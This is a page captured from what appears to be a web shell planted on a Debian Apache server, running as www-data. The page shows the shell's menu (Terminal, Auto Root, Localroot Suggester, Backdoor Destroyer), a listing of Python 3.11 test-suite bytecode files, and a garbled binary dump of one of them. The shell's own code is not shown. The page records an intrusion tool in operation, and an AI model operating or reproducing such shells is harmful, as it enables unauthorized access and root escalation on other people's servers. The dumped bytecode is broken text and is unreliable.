Linux vmi2545633.contaboserver.net 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64
Apache/2.4.62 (Debian)
Server IP : 127.0.0.1 & Your IP : 127.0.0.1
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python3.11 /
test /
libregrtest /
__pycache__ /
Delete
Unzip
Name
Size
Permission
Date
Action
__init__.cpython-311.pyc
358
B
-rw-r--r--
2025-04-07 20:15
cmdline.cpython-311.pyc
21.69
KB
-rw-r--r--
2025-04-07 20:15
main.cpython-311.pyc
38.24
KB
-rw-r--r--
2025-04-07 20:15
pgo.cpython-311.pyc
1.04
KB
-rw-r--r--
2025-04-07 20:15
refleak.cpython-311.pyc
9.32
KB
-rw-r--r--
2025-04-07 20:15
runtest.cpython-311.pyc
20.31
KB
-rw-r--r--
2025-04-07 20:15
runtest_mp.cpython-311.pyc
25.21
KB
-rw-r--r--
2025-04-07 20:15
save_env.cpython-311.pyc
22.83
KB
-rw-r--r--
2025-04-07 20:15
setup.cpython-311.pyc
7.22
KB
-rw-r--r--
2025-04-07 20:15
utils.cpython-311.pyc
8.35
KB
-rw-r--r--
2025-04-07 20:15
win_utils.cpython-311.pyc
4.28
KB
-rw-r--r--
2025-04-07 20:15
Save
Rename
� *�Kg�2 � � � d dl Z d dlZd dlZd dlZd dlZd dlmZ d dlmZ d dl m Z G d� de� � Z G d� d� � Z dS ) � N)�support)� os_helper)� print_warningc � � e Zd ZdS )�SkipTestEnvironmentN)�__name__� __module__�__qualname__� � �0/usr/lib/python3.11/test/libregrtest/save_env.pyr r s � � � � � ��Dr r c � � e Zd ZdZdDdd�d�ZdZd� Zd� Zd � Zd � Z d� Z d� Zd � Zd� Z d� Zd� Zd� Zd� Zd� Zd� Zd� Zd� Zd� Zd� Zd� Zd� Zd� Zd� Zd� Zd� Zd� Zd � Zd!� Z d"� Z!d#� Z"d$� Z#d%� Z$d&� Z%d'� Z&d(� Z'd)� Z(d*� Z)d+� Z*d,� Z+d-� Z,d.� Z-d/� Z.d0� Z/d1� Z0d2� Z1d3� Z2d4� Z3d5� Z4d6� Z5d7� Z6d8� Z7d9� Z8d:� Z9d;� e:e;� � D � � Z<d<� Z=d=� Z>d>� Z?d?� Z@d@� ZAdA� ZBdB� ZCdCS )E�saved_test_environmenta� Save bits of the test environment and restore them at block exit. with saved_test_environment(testname, verbose, quiet): #stuff Unless quiet is True, a warning is printed to stderr if any of the saved items was changed by the test. The support.environment_altered attribute is set to True if a change is detected. If verbose is more than 1, the before and after state of changed items is also printed. r F)�pgoc �>